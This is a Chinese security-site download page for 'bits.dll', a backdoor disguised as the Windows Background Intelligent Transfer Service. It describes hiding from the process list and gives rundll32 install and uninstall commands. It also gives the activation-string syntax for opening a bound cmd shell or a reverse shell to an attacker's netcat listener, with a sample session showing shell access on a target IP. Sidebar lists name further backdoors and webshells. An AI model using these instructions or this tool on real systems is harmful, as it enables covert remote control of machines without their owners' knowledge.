首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全工具>后门程序>软件详细
软件名称:  bits.dll
文件类型:  
界面语言:  简体中文
软件类型:  国产软件
运行环境:  WinNT/2K/Xp
授权方式:  共享软件
软件大小:  68K
软件等级:  ★★★★☆
发布时间:  2003-09-19
官方网址: http://www.netseyes.com 作者:vitter
演示网址:
软件说明:  
[BITS] 2003/09/16

BITS(Beat IT Security?),对商业的IT Security开始觉得厌倦了,So,Let's Beat IT Security :-)。

BITS其实是Background Intelligent Transfer Service的缩写,让我们暂时借用这个服务和名字吧,因为BITS是一个冒名顶替的后门,也可以在不知不觉中实现另一种意义的Background Intelligent Transfer Service。

这个后门是根据Bingle的关于svchost的原理写的,Thanks to Bingle。

特点:

进程管理器中看不到

平时没有端口,只是在系统中充当卧底的角色

提供正向连接和反向连接两种功能

仅适用于Windows2000/XP/2003

安装:

在Administrators的权限下或者LocalSystem下:

rundll32.exe BITS.dll,Install <Active Strings>

Active Strings是用户自己指定的一个特征字符串,用于激活BITS。

卸载:
rundll32.exe BITS.dll,Uninstall
重启系统

通常情况下安装和卸载无论成功或者失败都不会有提示。

正向连接:

1、用nc连接目标主机的任何一个TCP端口(80/139/445.....)
2、按照以下格式输入激活命令
<Active Strings>@dancewithdolphin[xell]:<PORT>
例如,在安装的时候设定了Active Strings为BITS Door,将CMD绑定在端口99:
BITS Door@dancewithdolphin[xell]:99

这样目标主机就会将CMD绑定在99。
3、连接目标主机的指定端口(上例中为99)

反向连接:

很多情况下主机是在防火墙后面的,这样就需要用反向连接。

1、在本地使用NC监听(如:nc -l -p 1234)
2、用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....)
3、按照以下格式输入激活命令
<Active Strings>@dancewithdolphin[rxell]:<Your IP>:<Listen Port>
例如,在安装的时候设定了Active Strings为BITS Door,本机地址为1.1.1.1, nc在1234
端口监听:
BITS Door@dancewithdolphin[rxell]:1.1.1.1:1234
4、目标主机的CMD将会出现在NC监听的端口1234。

注意:所有的输入都区分大小写。

Example:

C:\My Documents>nc 219.237.63.199 139
securitystrings@dancewithdolphin[xell]:7
?

C:\My Documents>nc 219.237.63.199 7
廙icrosoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

如果没有成功,可以尝试在安装的时候使用:

rundll32.exe BITS.dll,Install rasauto <Active Strings>


下载地址: 进入下载地址列表
下载说明: ☉推荐使用网际快车下载本站软件,使用 WinRAR v3.10 以上版本解压本站软件。
☉如果这个软件总是不能下载的请点击报告错误,谢谢合作!!
☉下载本站资源,如果服务器暂不能下载请过一段时间重试!
☉如果遇到什么问题,请到本站论坛去咨寻,我们将在那里提供更多 、更好的资源!
☉本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热门软件
·ASP+PHP两用Shell.rar
·T00ls Lpk Sethc 首创lpk劫持方
·PhpShell.php
·pam_backdoor.tar.gz
·ASPXspy 2.0
·eeyebootroot.zip
·aspxspy.rar
·新型.net一句话webshell及客户端
·NetCat_New_fixed_version.rar
·rknt.zip
·ZXshell2.0.rar
·Mysql BackDoorDoor
  相关软件
·aspmu.rar
·urc.zip后门程序
·cmdbind2及其原码
·Recub.zip 后门(远程管理)程序
·Flux v0.90a
·MirLegend
·icyfox007v1.10.rar
·HELL-DOOR DROPPER
·PhpShell.php
·Poly Server 1.0b
·php_files_thief.rar
·saphpshell.rar
 
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved